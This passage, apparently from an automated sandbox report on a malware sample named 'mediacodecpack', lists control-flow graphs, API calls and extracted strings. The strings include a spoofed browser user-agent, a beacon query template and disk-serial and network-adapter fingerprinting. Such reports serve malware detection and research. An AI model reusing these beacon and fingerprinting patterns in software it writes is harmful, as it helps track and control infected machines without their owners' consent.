353 2d46886-2d46955 call 2d51428 call 2d41ba7 348->353 363 2d46957 call 2d4143f 353->363 364 2d4695c-2d4697d RtlEnterCriticalSection 353->364 363->364 369 2d4697f-2d46986 364->369 370 2d46989-2d469f0 RtlLeaveCriticalSection call 2d43c67 call 2d43d7e call 2d4733f 364->370 365->366 371 2d465ea-2d465fc call 2d5134c 365->371 367 2d46625-2d46653 call 2d51fbc call 2d53760 call 2d4439c 366->367 391 2d46694-2d4669d call 2d51f84 367->391 392 2d46655-2d46664 call 2d525f6 367->392 369->370 389 2d469f6-2d46a38 call 2d49729 370->389 390 2d46b58-2d46b6c call 2d48007 370->390 371->366 378 2d465fe-2d4661f call 2d4439c 371->378 378->367 401 2d46b22-2d46b33 call 2d473ee 389->401 402 2d46a3e-2d46a45 389->402 390->282 403 2d467c0-2d467cd 391->403 404 2d466a3-2d466bb call 2d527c5 391->404 392->391 405 2d46666 392->405 411 2d46b38-2d46b53 call 2d433b2 401->411 408 2d46a48-2d46a4d 402->408 403->282 417 2d466c7 404->417 418 2d466bd-2d466c5 call 2d4873b 404->418 406 2d4666b-2d4667d call 2d51860 405->406 420 2d46682-2d46692 call 2d525f6 406->420 421 2d4667f 406->421 408->408 412 2d46a4f-2d46a94 call 2d49729 408->412 411->390 412->401 426 2d46a9a-2d46aa0 412->426 419 2d466c9-2d46757 call 2d49853 call 2d43863 call 2d45119 call 2d43863 call 2d49af9 call 2d49c13 417->419 418->419 446 2d4675c-2d4676d 419->446 420->391 420->406 421->420 430 2d46aa3-2d46aa8 426->430 430->430 432 2d46aaa-2d46ae5 call 2d49729 430->432 432->401 438 2d46ae7-2d46b1b call 2d4c11b 432->438 442 2d46b20-2d46b21 438->442 442->401 447 2d46774-2d4679f Sleep call 2d50900 446->447 448 2d4676f call 2d4380b 446->448 452 2d467a1-2d467aa call 2d44100 447->452 453 2d467ab-2d467b9 447->453 448->447 452->453 453->403 455 2d467bb call 2d4380b 453->455 455->403
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.NTDLL(02D74FD0), ref: 02D45E92
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D45EA9
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D45EB2
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D45EC1
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D45EC4
                                                                                            • GetTickCount.KERNEL32 ref: 02D45ED8
                                                                                              • Part of subcall function 02D459FA: _malloc.LIBCMT ref: 02D45A08
                                                                                            • GetVersionExA.KERNEL32(02D74E20), ref: 02D45F05
                                                                                            • _memset.LIBCMT ref: 02D45F24
                                                                                            • _malloc.LIBCMT ref: 02D45F31
                                                                                              • Part of subcall function 02D51FBC: __FF_MSGBANNER.LIBCMT ref: 02D51FD3
                                                                                              • Part of subcall function 02D51FBC: __NMSG_WRITE.LIBCMT ref: 02D51FDA
                                                                                              • Part of subcall function 02D51FBC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02D51FFF
                                                                                            • _malloc.LIBCMT ref: 02D45F41
                                                                                            • _malloc.LIBCMT ref: 02D45F4C
                                                                                            • _malloc.LIBCMT ref: 02D45F57
                                                                                            • _malloc.LIBCMT ref: 02D45F62
                                                                                            • _malloc.LIBCMT ref: 02D45F6D
                                                                                            • _malloc.LIBCMT ref: 02D45F78
                                                                                            • _malloc.LIBCMT ref: 02D45F84
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D45F9B
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FA4
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FB0
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FB3
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FBE
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FC1
                                                                                            • _memset.LIBCMT ref: 02D45FD1
                                                                                            • _memset.LIBCMT ref: 02D45FDD
                                                                                            • _memset.LIBCMT ref: 02D45FEA
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D45FF8
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D46005
                                                                                            • _malloc.LIBCMT ref: 02D46026
                                                                                            • _malloc.LIBCMT ref: 02D46034
                                                                                            • _malloc.LIBCMT ref: 02D4603B
                                                                                            • _malloc.LIBCMT ref: 02D4605C
                                                                                            • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D46068
                                                                                            • Sleep.KERNELBASE(00000000), ref: 02D46076
                                                                                            • _malloc.LIBCMT ref: 02D46082
                                                                                            • _malloc.LIBCMT ref: 02D46092
                                                                                            • _memset.LIBCMT ref: 02D460A7
                                                                                            • _memset.LIBCMT ref: 02D460B7
                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02D46104
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D4610F
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D46120
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _malloc$Heap$_memset$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                            • String ID: @mp$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                            • API String ID: 1856495841-1622055518
                                                                                            • Opcode ID: 308b66ba86de82b766d1937d443339dfaf4f5fa933d8127289b53c4ae04d1f07
                                                                                            • Instruction ID: fe7f2a41f063b4fb7f004ea227af35233e6066de1c79d3697fbddee1503fa390
                                                                                            • Opcode Fuzzy Hash: 308b66ba86de82b766d1937d443339dfaf4f5fa933d8127289b53c4ae04d1f07
                                                                                            • Instruction Fuzzy Hash: 4B71B071D48350AFD711AB74A809B5BBBE8EF55314F100D1DFA8997381EBB88C548FA2

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 790 2d4e9ab-2d4e9ce LoadLibraryA 791 2d4e9d4-2d4e9e2 GetProcAddress 790->791 792 2d4ea8e-2d4ea95 790->792 793 2d4ea87-2d4ea88 FreeLibrary 791->793 794 2d4e9e8-2d4e9f8 791->794 793->792 795 2d4e9fa-2d4ea06 GetAdaptersInfo 794->795 796 2d4ea3e-2d4ea46 795->796 797 2d4ea08 795->797 798 2d4ea4f-2d4ea54 796->798 799 2d4ea48-2d4ea4e call 2d526df 796->799 800 2d4ea0a-2d4ea11 797->800 802 2d4ea56-2d4ea59 798->802 803 2d4ea82-2d4ea86 798->803 799->798 804 2d4ea13-2d4ea17 800->804 805 2d4ea1b-2d4ea23 800->805 802->803 807 2d4ea5b-2d4ea60 802->807 803->793 804->800 808 2d4ea19 804->808 809 2d4ea26-2d4ea2b 805->809 810 2d4ea62-2d4ea6a 807->810 811 2d4ea6d-2d4ea78 call 2d527c5 807->811 808->796 809->809 812 2d4ea2d-2d4ea3a call 2d4e6fa 809->812 810->811 811->803 817 2d4ea7a-2d4ea7d 811->817 812->796 817->795
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 02D4E9C1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D4E9DA
                                                                                            • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D4E9FF
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 02D4EA88
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                            • API String ID: 514930453-3114217049
                                                                                            • Opcode ID: 3245ed24d717381837910ca32d33c7fb73fa79e4891099e0784b55caaba1d14d
                                                                                            • Instruction ID: 69b1db60b494abe1c03b71209b822ec4dd893d1df2c2072bb3880630f1444bee
                                                                                            • Opcode Fuzzy Hash: 3245ed24d717381837910ca32d33c7fb73fa79e4891099e0784b55caaba1d14d
                                                                                            • Instruction Fuzzy Hash: 9821A271A08259ABDB10DBA8D8856EEBBB8FF05314F1441AAE585E7301DB709E45CBA0

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 818 2d42b95-2d42baf 819 2d42bc7-2d42bcb 818->819 820 2d42bb1-2d42bb9 call 2d4fb20 818->820 822 2d42bcd-2d42bd0 819->822 823 2d42bdf 819->823 827 2d42bbf-2d42bc2 820->827 822->823 825 2d42bd2-2d42bdd call 2d4fb20 822->825 826 2d42be2-2d42c11 WSASetLastError WSARecv call 2d4950d 823->826 825->827 832 2d42c16-2d42c1d 826->832 830 2d42d30 827->830 833 2d42d32-2d42d38 830->833 834 2d42c2c-2d42c32 832->834 835 2d42c1f-2d42c2a call 2d4fb20 832->835 836 2d42c34-2d42c39 call 2d4fb20 834->836 837 2d42c46-2d42c48 834->837 843 2d42c3f-2d42c42 835->843 836->843 841 2d42c4f-2d42c60 call 2d4fb20 837->841 842 2d42c4a-2d42c4d 837->842 841->833 845 2d42c66-2d42c69 841->845 842->845 843->837 848 2d42c73-2d42c76 845->848 849 2d42c6b-2d42c6d 845->849 848->830 851 2d42c7c-2d42c9a call 2d4fb20 call 2d4166f 848->851 849->848 850 2d42d22-2d42d2d call 2d41996 849->850 850->830 858 2d42cbc-2d42cfa WSASetLastError select call 2d4950d 851->858 859 2d42c9c-2d42cba call 2d4fb20 call 2d4166f 851->859 865 2d42cfc-2d42d06 call 2d4fb20 858->865 866 2d42d08 858->866 859->830 859->858 872 2d42d19-2d42d1d 865->872 869 2d42d15-2d42d17 866->869 870 2d42d0a-2d42d12 call 2d4fb20 866->870 869->830 869->872 870->869 872->826
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D42BE4
                                                                                            • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D42C07
                                                                                              • Part of subcall function 02D4950D: WSAGetLastError.WS2_32(00000000,?,?,02D42A51), ref: 02D4951B
                                                                                            • WSASetLastError.WS2_32 ref: 02D42CD3
                                                                                            • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D42CE7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Recvselect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 886190287-280543908
                                                                                            • Opcode ID: 61dddbe247a9118998a13a1706be7c1b554b742acf8bb935caa7d76f4ffeb4cb
                                                                                            • Instruction ID: 88a0104b85cd3db30fa9c5750fe3a3149040f94c90d2cf3cba33a107878e524b
                                                                                            • Opcode Fuzzy Hash: 61dddbe247a9118998a13a1706be7c1b554b742acf8bb935caa7d76f4ffeb4cb
                                                                                            • Instruction Fuzzy Hash: 674127B19083019FD7109F64C9187ABBBE9AF85354F10491EF89987790EF74DD40CBA2

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 875 2d4e8a7-2d4e8d2 CreateFileA 876 2d4e9a3-2d4e9aa 875->876 877 2d4e8d8-2d4e8ed 875->877 878 2d4e8f0-2d4e912 DeviceIoControl 877->878 879 2d4e914-2d4e91c 878->879 880 2d4e94b-2d4e953 878->880 883 2d4e925-2d4e92a 879->883 884 2d4e91e-2d4e923 879->884 881 2d4e955-2d4e95b call 2d526df 880->881 882 2d4e95c-2d4e95e 880->882 881->882 886 2d4e960-2d4e963 882->886 887 2d4e999-2d4e9a2 CloseHandle 882->887 883->880 888 2d4e92c-2d4e934 883->888 884->880 890 2d4e965-2d4e96e GetLastError 886->890 891 2d4e97f-2d4e98c call 2d527c5 886->891 887->876 892 2d4e937-2d4e93c 888->892 890->887 893 2d4e970-2d4e973 890->893 891->887 899 2d4e98e-2d4e994 891->899 892->892 895 2d4e93e-2d4e94a call 2d4e6fa 892->895 893->891 896 2d4e975-2d4e97c 893->896 895->880 896->891 899->878
                                                                                            APIs
                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D4E8C6
                                                                                            • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D4E904
                                                                                            • GetLastError.KERNEL32 ref: 02D4E965
                                                                                            • CloseHandle.KERNELBASE(?), ref: 02D4E99C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                            • API String ID: 4026078076-1180397377
                                                                                            • Opcode ID: 77ebb4be8ac56b024ab941454cef88ecc69d4543a81fd3ce9dc2f3760fced96c
                                                                                            • Instruction ID: e06359a148760a9dd71d8c45e23370d3219473bb0326f6ac0ff5fe44bfa35723
                                                                                            • Opcode Fuzzy Hash: 77ebb4be8ac56b024ab941454cef88ecc69d4543a81fd3ce9dc2f3760fced96c
                                                                                            • Instruction Fuzzy Hash: 80316B71D00229FBDB24CF95D888BAEBBB8FF45754F20456AE505A7380DB705E44CBA0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 921 401951-40d878 GetLocalTime 925 40de86-40df52 StartServiceCtrlDispatcherA 921->925 926 40d87e-40d88c 921->926 928 40e028-40e02e lstrcmpiW 925->928 926->928
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(0040BE00), ref: 00401B4D
                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040DF4C
                                                                                            • lstrcmpiW.KERNELBASE(?,/chk), ref: 0040E028
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: CtrlDispatcherLocalServiceStartTimelstrcmpi
                                                                                            • String ID: /chk
                                                                                            • API String ID: 4108452588-3837807730
                                                                                            • Opcode ID: b98aab331838fe6632ee09d3ee6537478d9e654e437189eacf188a04f6302d0c
                                                                                            • Instruction ID: c0b6fb2c802bab406561895994aa9e9237411ab6f3462ae67dbec63e80f3bd48
                                                                                            • Opcode Fuzzy Hash: b98aab331838fe6632ee09d3ee6537478d9e654e437189eacf188a04f6302d0c
                                                                                            • Instruction Fuzzy Hash: 4121D070904658CBDB048B609E697E63BF4AB06340F0081BAC886F72E2D738890ADB19

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 2d45de1-2d45de4 1 2d45dea-2d45dec 0->1 2 2d45e6d-2d45ec4 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 1->2 3 2d45def-2d45df7 1->3 6 2d45ecb-2d460ec GetTickCount call 2d459fa GetVersionExA call 2d53760 call 2d51fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d53760 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d51fbc * 4 QueryPerformanceCounter Sleep call 2d51fbc * 2 call 2d53760 * 2 2->6 7 2d45ec6 call 2d442c7 2->7 4 2d45dbf-2d45dc2 3->4 5 2d45df9-2d45e3b 3->5 8 2d45dc4 4->8 9 2d45d61-2d45d78 4->9 11 2d45dc5-2d45dcf 5->11 18 2d45e3d-2d45e3e 5->18 61 2d460f0-2d460f2 6->61 7->6 8->11 13 2d45d7a-2d45d8e 9->13 14 2d45d0b-2d45d15 9->14 17 2d45d94-2d45da9 11->17 19 2d45d18-2d45d1e 13->19 20 2d45d90 13->20 14->19 17->4 18->2 20->1 21 2d45d92 20->21 21->17 62 2d460f4-2d460f9 61->62 63 2d460fb-2d460fd 61->63 64 2d46104 Sleep 62->64 65 2d460ff 63->65 66 2d4610a-2d46448 RtlEnterCriticalSection RtlLeaveCriticalSection 63->66 64->66 65->64 68 2d46464-2d4646e 66->68 69 2d4644a-2d46450 66->69 68->61 70 2d46474-2d46498 call 2d53760 call 2d4439c 68->70 71 2d46456-2d46463 call 2d4534d 69->71 72 2d46452-2d46454 69->72 70->61 79 2d4649e-2d464c9 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d5134c 70->79 71->68 72->68 82 2d46513-2d4652b call 2d5134c 79->82 83 2d464cb-2d464da call 2d5134c 79->83 88 2d46531-2d46533 82->88 89 2d467d2-2d467e1 call 2d5134c 82->89 83->82 90 2d464dc-2d464eb call 2d5134c 83->90 88->89 93 2d46539-2d465e4 call 2d51fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d53760 * 5 call 2d4439c * 2 88->93 98 2d46826-2d46835 call 2d5134c 89->98 99 2d467e3-2d467e5 89->99 90->82 97 2d464ed-2d464fc call 2d5134c 90->97 144 2d465e6-2d465e8 93->144 145 2d46621 93->145 97->82 113 2d464fe-2d4650d call 2d5134c 97->113 111 2d46837-2d46845 call 2d45c11 call 2d45d1f 98->111 112 2d4684a-2d46859 call 2d5134c 98->112 99->98 103 2d467e7-2d46821 call 2d53760 RtlEnterCriticalSection RtlLeaveCriticalSection 99->103 103->61 111->61 112->61 124 2d4685f-2d46861 112->124 113->61 113->82 124->61 127 2d46867-2d46880 call 2d4439c 124->127 127->61 132 2d46886-2d46955 call 2d51428 call 2d41ba7 127->132 142 2d46957 call 2d4143f 132->142 143 2d4695c-2d4697d RtlEnterCriticalSection 132->143 142->143 148 2d4697f-2d46986 143->148 149 2d46989-2d469f0 RtlLeaveCriticalSection call 2d43c67 call 2d43d7e call 2d4733f 143->149 144->145 150 2d465ea-2d465fc call 2d5134c 144->150 146 2d46625-2d46653 call 2d51fbc call 2d53760 call 2d4439c 145->146 170 2d46694-2d4669d call 2d51f84 146->170 171 2d46655-2d46664 call 2d525f6 146->171 148->149 168 2d469f6-2d46a38 call 2d49729 149->168 169 2d46b58-2d46b6c call 2d48007 149->169 150->145 157 2d465fe-2d4661f call 2d4439c 150->157 157->146 180 2d46b22-2d46b53 call 2d473ee call 2d433b2 168->180 181 2d46a3e-2d46a45 168->181 169->61 182 2d467c0-2d467cd 170->182 183 2d466a3-2d466bb call 2d527c5 170->183 171->170 184 2d46666 171->184 180->169 187 2d46a48-2d46a4d 181->187 182->61 196 2d466c7 183->196 197 2d466bd-2d466c5 call 2d4873b 183->197 185 2d4666b-2d4667d call 2d51860 184->185 199 2d46682-2d46692 call 2d525f6 185->199 200 2d4667f 185->200 187->187 191 2d46a4f-2d46a94 call 2d49729 187->191 191->180 205 2d46a9a-2d46aa0 191->205 198 2d466c9-2d4676d call 2d49853 call 2d43863 call 2d45119 call 2d43863 call 2d49af9 call 2d49c13 196->198 197->198 226 2d46774-2d4679f Sleep call 2d50900 198->226 227 2d4676f call 2d4380b 198->227 199->170 199->185 200->199 209 2d46aa3-2d46aa8 205->209 209->209 211 2d46aaa-2d46ae5 call 2d49729 209->211 211->180 217 2d46ae7-2d46b21 call 2d4c11b 211->217 217->180 231 2d467a1-2d467aa call 2d44100 226->231 232 2d467ab-2d467b9 226->232 227->226 231->232 232->182 234 2d467bb call 2d4380b 232->234 234->182
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.NTDLL(02D74FD0), ref: 02D45E92
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D45EA9
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D45EB2
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D45EC1
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D45EC4
                                                                                            • GetTickCount.KERNEL32 ref: 02D45ED8
                                                                                            • GetVersionExA.KERNEL32(02D74E20), ref: 02D45F05
                                                                                            • _memset.LIBCMT ref: 02D45F24
                                                                                            • _malloc.LIBCMT ref: 02D45F31
                                                                                            • _malloc.LIBCMT ref: 02D45F41
                                                                                            • _malloc.LIBCMT ref: 02D45F4C
                                                                                            • _malloc.LIBCMT ref: 02D45F57
                                                                                            • _malloc.LIBCMT ref: 02D45F62
                                                                                            • _malloc.LIBCMT ref: 02D45F6D
                                                                                            • _malloc.LIBCMT ref: 02D45F78
                                                                                            • _malloc.LIBCMT ref: 02D45F84
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D45F9B
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FA4
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FB0
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FB3
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FBE
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion_memset
                                                                                            • String ID: @mp$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                            • API String ID: 3007647348-1622055518
                                                                                            • Opcode ID: ae8f3c39b6e5d4e4d1ce202106c7e0be86cf3b867d426e41ac59a4c4c66670b4
                                                                                            • Instruction ID: 1e1604252ec09d8c679c75cd489d41b9388e248e1c18fa45b6f7230ecf4fabfd
                                                                                            • Opcode Fuzzy Hash: ae8f3c39b6e5d4e4d1ce202106c7e0be86cf3b867d426e41ac59a4c4c66670b4
                                                                                            • Instruction Fuzzy Hash: E2A1F472D483509FD711AF34A84875BBFE4EF5A314F54086EE98897381DBB88C15CBA2

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 458 2d463f5-2d46448 459 2d46464-2d4646e 458->459 460 2d4644a-2d46450 458->460 461 2d46474-2d46498 call 2d53760 call 2d4439c 459->461 462 2d460f0-2d460f2 459->462 463 2d46456-2d46463 call 2d4534d 460->463 464 2d46452-2d46454 460->464 461->462 476 2d4649e-2d464c9 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d5134c 461->476 467 2d460f4-2d460f9 462->467 468 2d460fb-2d460fd 462->468 463->459 464->459 471 2d46104 Sleep 467->471 472 2d460ff 468->472 473 2d4610a-2d46139 RtlEnterCriticalSection RtlLeaveCriticalSection 468->473 471->473 472->471 473->458 479 2d46513-2d4652b call 2d5134c 476->479 480 2d464cb-2d464da call 2d5134c 476->480 485 2d46531-2d46533 479->485 486 2d467d2-2d467e1 call 2d5134c 479->486 480->479 487 2d464dc-2d464eb call 2d5134c 480->487 485->486 490 2d46539-2d465e4 call 2d51fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d53760 * 5 call 2d4439c * 2 485->490 495 2d46826-2d46835 call 2d5134c 486->495 496 2d467e3-2d467e5 486->496 487->479 494 2d464ed-2d464fc call 2d5134c 487->494 541 2d465e6-2d465e8 490->541 542 2d46621 490->542 494->479 510 2d464fe-2d4650d call 2d5134c 494->510 508 2d46837-2d46845 call 2d45c11 call 2d45d1f 495->508 509 2d4684a-2d46859 call 2d5134c 495->509 496->495 500 2d467e7-2d46821 call 2d53760 RtlEnterCriticalSection RtlLeaveCriticalSection 496->500 500->462 508->462 509->462 521 2d4685f-2d46861 509->521 510->462 510->479 521->462 524 2d46867-2d46880 call 2d4439c 521->524 524->462 529 2d46886-2d46955 call 2d51428 call 2d41ba7 524->529 539 2d46957 call 2d4143f 529->539 540 2d4695c-2d4697d RtlEnterCriticalSection 529->540 539->540 545 2d4697f-2d46986 540->545 546 2d46989-2d469f0 RtlLeaveCriticalSection call 2d43c67 call 2d43d7e call 2d4733f 540->546 541->542 547 2d465ea-2d465fc call 2d5134c 541->547 543 2d46625-2d46653 call 2d51fbc call 2d53760 call 2d4439c 542->543 567 2d46694-2d4669d call 2d51f84 543->567 568 2d46655-2d46664 call 2d525f6 543->568 545->546 565 2d469f6-2d46a38 call 2d49729 546->565 566 2d46b58-2d46b6c call 2d48007 546->566 547->542 554 2d465fe-2d4661f call 2d4439c 547->554 554->543 577 2d46b22-2d46b53 call 2d473ee call 2d433b2 565->577 578 2d46a3e-2d46a45 565->578 566->462 579 2d467c0-2d467cd 567->579 580 2d466a3-2d466bb call 2d527c5 567->580 568->567 581 2d46666 568->581 577->566 584 2d46a48-2d46a4d 578->584 579->462 593 2d466c7 580->593 594 2d466bd-2d466c5 call 2d4873b 580->594 582 2d4666b-2d4667d call 2d51860 581->582 596 2d46682-2d46692 call 2d525f6 582->596 597 2d4667f 582->597 584->584 588 2d46a4f-2d46a94 call 2d49729 584->588 588->577 602 2d46a9a-2d46aa0 588->602 595 2d466c9-2d4676d call 2d49853 call 2d43863 call 2d45119 call 2d43863 call 2d49af9 call 2d49c13 593->595 594->595 623 2d46774-2d4679f Sleep call 2d50900 595->623 624 2d4676f call 2d4380b 595->624 596->567 596->582 597->596 606 2d46aa3-2d46aa8 602->606 606->606 608 2d46aaa-2d46ae5 call 2d49729 606->608 608->577 614 2d46ae7-2d46b21 call 2d4c11b 608->614 614->577 628 2d467a1-2d467aa call 2d44100 623->628 629 2d467ab-2d467b9 623->629 624->623 628->629 629->579 631 2d467bb call 2d4380b 629->631 631->579
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02D46104
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D4610F
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D46120
                                                                                              • Part of subcall function 02D527C5: _malloc.LIBCMT ref: 02D527DD
                                                                                            • _memset.LIBCMT ref: 02D46480
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D464A3
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D464B4
                                                                                            • _malloc.LIBCMT ref: 02D4653B
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D4654D
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D46559
                                                                                            • _memset.LIBCMT ref: 02D46573
                                                                                            • _memset.LIBCMT ref: 02D46582
                                                                                            • _memset.LIBCMT ref: 02D46592
                                                                                            • _memset.LIBCMT ref: 02D465A1
                                                                                            • _memset.LIBCMT ref: 02D465B0
                                                                                            • _malloc.LIBCMT ref: 02D4662A
                                                                                            • _memset.LIBCMT ref: 02D4663B
                                                                                            • _strtok.LIBCMT ref: 02D4665B
                                                                                            • _swscanf.LIBCMT ref: 02D46672
                                                                                            • _strtok.LIBCMT ref: 02D46689
                                                                                            • _free.LIBCMT ref: 02D46695
                                                                                            • Sleep.KERNEL32(000007D0), ref: 02D46779
                                                                                            • _memset.LIBCMT ref: 02D467F2
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D467FF
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D46811
                                                                                              • Part of subcall function 02D4873B: __EH_prolog.LIBCMT ref: 02D48740
                                                                                              • Part of subcall function 02D4873B: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D487BB
                                                                                              • Part of subcall function 02D4873B: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D487D9
                                                                                            • _sprintf.LIBCMT ref: 02D4689B
                                                                                            • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D46960
                                                                                            • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D46994
                                                                                              • Part of subcall function 02D45C11: _malloc.LIBCMT ref: 02D45C1F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
